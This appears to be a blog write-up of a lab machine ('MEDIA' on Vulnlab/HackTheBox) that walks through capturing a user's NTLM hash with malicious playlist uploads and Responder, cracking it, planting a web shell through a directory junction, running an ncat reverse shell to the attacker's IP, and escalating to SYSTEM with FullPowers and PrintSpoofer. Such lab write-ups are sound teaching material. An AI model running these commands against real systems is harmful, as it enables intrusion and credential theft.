chidunguyen.com

MEDIA-HTB Notes

MEDIA-VL

Written by

Du

in

Here is my notes on MEDIA box from Vulnlab which deployed to Hackthebox.

MEDIA: 10.10.93.210

PORT     STATE SERVICE
22/tcp   open  ssh

┌──(root㉿kali)-[/home/kali/VL/MEDIA/10.10.93.210]
└─# hydra -l enox -p 1234virus@ 10.10.93.210 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-15 14:31:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://10.10.93.210:22/
[22][ssh] host: 10.10.93.210   login: enox   password: 1234virus@
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-15 14:31:05

ssh enox@10.10.93.210

enox@MEDIA C:\Users\enox>whoami
media\enox

enox@MEDIA C:\Users\enox>hostname
MEDIA

USER-SHELL ! 

enox@MEDIA C:\Users\enox\Desktop>whoami
media\enox

enox@MEDIA C:\Users\enox\Desktop>hostname
MEDIA

enox@MEDIA C:\Users\enox\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\Users\enox\Desktop

10/02/2023  10:04 AM    <DIR>          .
10/02/2023  09:26 AM    <DIR>          ..
10/10/2023  02:58 AM                36 user.txt
               1 File(s)             36 bytes
               2 Dir(s)   8,561,770,496 bytes free

enox@MEDIA C:\Users\enox\Desktop>type user.txt
VL{REDIRECTED}

USER.TXT: VL{REDIRECTED}

PRIV ESC: 

enox -> nt authority\local service:

enox@MEDIA C:\Users\enox\Documents>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\Users\enox\Documents

10/02/2023  10:04 AM    <DIR>          .
10/02/2023  09:26 AM    <DIR>          ..
10/02/2023  05:00 PM             2,841 review.ps1
               1 File(s)          2,841 bytes
               2 Dir(s)   8,561,750,016 bytes free

enox@MEDIA C:\Users\enox\Documents>type review.ps1
function Get-Values {
    param (
	
[SNIP] 

$todofile="C:\\Windows\\Tasks\\Uploads\\todo.txt"

[SNIP] 

enox@MEDIA C:\Windows\Tasks\Uploads>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\Windows\Tasks\Uploads

11/15/2024  11:28 AM    <DIR>          .
10/02/2023  10:04 AM    <DIR>          ..
11/15/2024  11:27 AM    <DIR>          7025e83db13769ba56c6cfac86dddc8b
11/15/2024  11:28 AM    <DIR>          d41d8cd98f00b204e9800998ecf8427e
11/15/2024  10:49 AM    <DIR>          f38a39dedc14746cbeb5327a3557547c
11/15/2024  11:28 AM                 0 todo.txt
               1 File(s)              0 bytes
               5 Dir(s)   8,561,750,016 bytes free

enox@MEDIA C:\Windows\Tasks\Uploads>type todo.txt

enox@MEDIA C:\Windows\Tasks\Uploads>cd d41d8cd98f00b204e9800998ecf8427e

enox@MEDIA C:\Windows\Tasks\Uploads\d41d8cd98f00b204e9800998ecf8427e>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\Windows\Tasks\Uploads\d41d8cd98f00b204e9800998ecf8427e

11/15/2024  11:28 AM    <DIR>          .
11/15/2024  11:28 AM    <DIR>          ..
11/15/2024  11:28 AM               145 Show.asx
               1 File(s)            145 bytes
               2 Dir(s)   8,561,741,824 bytes free
			   
#This is where the attacker file uploaded belong to. 

#The attacker can upload any malicious files through that upload input field of http service on TCP port 80, the one compatible with windows media player. 

C:\Windows\Tasks\Uploads - Can be Writable therefore able to create and upload malicious files there.

PS C:\xampp\htdocs> echo "hello world" > test.txt   #NOPE
out-file : Access to the path 'C:\xampp\htdocs\test.txt' is denied. 

Windows SYMBOLICLINK PRIV ESC:

mklink /J C:\Windows\Tasks\Uploads\d41d8cd98f00b204e9800998ecf8427e\shell.php C:\xampp\htdocs\shell.php

https://www.howtogeek.com/16226/complete-guide-to-symbolic-links-symlinks-on-windows-or-linux/

enox@MEDIA C:\Windows\Tasks\Uploads>cd d41d8cd98f00b204e9800998ecf8427e

enox@MEDIA C:\Windows\Tasks\Uploads\d41d8cd98f00b204e9800998ecf8427e>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\Windows\Tasks\Uploads\d41d8cd98f00b204e9800998ecf8427e

11/15/2024  11:28 AM    <DIR>          .
11/15/2024  11:28 AM    <DIR>          ..
11/15/2024  11:28 AM               145 Show.asx
               1 File(s)            145 bytes
               2 Dir(s)   8,561,741,824 bytes free
			   
#This is where the attacker file uploaded belong to. 

#The attacker can upload any malicious files through that upload input field of http service on TCP port 80, the one compatible with windows media player. 

C:\Windows\Tasks\Uploads - Can be Writable therefore able to create and upload malicious files there.

PS C:\xampp\htdocs> echo "hello world" > test.txt   #NOPE
out-file : Access to the path 'C:\xampp\htdocs\test.txt' is denied. 

enox@MEDIA C:\Windows\Tasks\Uploads>mklink /J C:\Windows\Tasks\Uploads\d41d8cd98f00b204e9800998ecf8427e\shell.php C:\xampp\htdocs\shell.php
Junction created for C:\Windows\Tasks\Uploads\d41d8cd98f00b204e9800998ecf8427e\shell.php <<===>> C:\xampp\htdocs\shell.php

#Upload shell.php on that upload input field as usual.

enox@MEDIA C:\Windows\Tasks\Uploads>dir C:\xampp\htdocs
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\xampp\htdocs

11/15/2024  12:10 PM    <DIR>          .
10/02/2023  10:03 AM    <DIR>          ..
10/02/2023  09:27 AM    <DIR>          assets
10/02/2023  09:27 AM    <DIR>          css
10/10/2023  04:00 AM            20,563 index.php
10/02/2023  09:27 AM    <DIR>          js
11/15/2024  12:10 PM            17,220 shell.php
               2 File(s)         37,783 bytes
               5 Dir(s)   8,502,398,976 bytes free

enox@MEDIA C:\Windows\Tasks\Uploads>dir C:\Windows\Tasks\Uploads\d41d8cd98f00b204e9800998ecf8427e\
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\Windows\Tasks\Uploads\d41d8cd98f00b204e9800998ecf8427e

11/15/2024  12:10 PM    <DIR>          .
11/15/2024  12:11 PM    <DIR>          ..
11/15/2024  12:10 PM    <JUNCTION>     shell.php [C:\xampp\htdocs\shell.php]
               0 File(s)              0 bytes
               3 Dir(s)   8,502,300,672 bytes free

http://10.10.124.184/shell.php

p0wny@shell:C:\xampp\htdocs# whoami
nt authority\local service

p0wny@shell:C:\xampp\htdocs# hostname
MEDIA

Convert it into a reverse-shell as usual: 

PS C:\xampp\htdocs> whoami
nt authority\local service
PS C:\xampp\htdocs> hostname
MEDIA
PS C:\xampp\htdocs> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== ========
SeTcbPrivilege                Act as part of the operating system Disabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeCreateGlobalPrivilege       Create global objects               Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Disabled
SeTimeZonePrivilege           Change the time zone                Disabled


NT Authority \ Local Service Prvileges Restored: 

https://github.com/itm4n/FullPowers

https://itm4n.github.io/localservice-privileges/



./FullPowers.exe -c "C:\Users\Public\ncat.exe 10.8.0.71 4444 -e cmd" -z

C:\Windows\system32>whoami
whoami
nt authority\local service

C:\Windows\system32>hostname
hostname
MEDIA

C:\Windows\system32>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled


#POTATO TIME !

C:\Users\Public>PrintSpoofer64.exe -i -c cmd
PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>hostname
hostname
MEDIA

SYSTEM-SHELL ! 

C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system

C:\Users\Administrator\Desktop>hostname
hostname
MEDIA

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\Users\Administrator\Desktop

10/02/2023  10:04 AM    <DIR>          .
10/01/2023  10:48 PM    <DIR>          ..
10/10/2023  02:58 AM                36 root.txt
               1 File(s)             36 bytes
               2 Dir(s)   8,212,729,856 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
VL{REDIRECTED}

ROOT.TXT: VL{REDIRECTED}



80/tcp   open  http


Hiring section is very interesting. 

Upload a brief introduction video (compatible with Windows Media Player):

Please upload a brief introduction video about yourself and your experiences, explaining why you think you're fit for the job.


We can upload a malicious files that is compatible with Windows Media Player to steal a user hash with NTLM-THEFT and Responder tools. 

NTLM-THEFT: 

.wax - via Windows Media Player playlist (Better, primary open)
.asx – via Windows Media Player playlist (Better, primary open)
.m3u – via Windows Media Player playlist (Worse, Win10 opens first in Groovy)

python3 ntlm_theft.py --generate all --server 10.8.0.71 --filename Show

Upload those three malicious video files to gather a hash with responder tool:

sudo responder -I tun0

#Then wait for a few seconds to get the hash. 

[SMB] NTLMv2-SSP Client   : 10.10.93.210
[SMB] NTLMv2-SSP Username : MEDIA\enox
[SMB] NTLMv2-SSP Hash     : enox::MEDIA:e915d0afab6c5a00:B2D18C349D4AC1CE555BE36A3EB04D78:010100000000000080E90E4F6A37DB01E70F40DD9AA403FB0000000002000800350055004500330001001E00570049004E002D004E0036004F004400470042005300450046005900300004003400570049004E002D004E0036004F00440047004200530045004600590030002E0035005500450033002E004C004F00430041004C000300140035005500450033002E004C004F00430041004C000500140035005500450033002E004C004F00430041004C000700080080E90E4F6A37DB0106000400020000000800300030000000000000000000000000300000B98798DA7CAB81E9B0A60BD5F604A5C25B4FDF6BDACC09A7AD8A5D69695006EE0A0010000000000000000000000000000000000009001C0063006900660073002F00310030002E0038002E0030002E00370031000000000000000000

NTLMv2 HASH CAPTURED ! 

┌──(root㉿kali)-[/home/kali/VL/MEDIA/10.10.93.210]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1234virus@       (enox)
1g 0:00:00:34 DONE (2024-11-15 14:29) 0.02914g/s 388767p/s 388767c/s 388767C/s 1234ถ6789..1234dork
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

HASH CRACKED ! 

enox:1234virus@ 





3389/tcp open  ms-wbt-server

More posts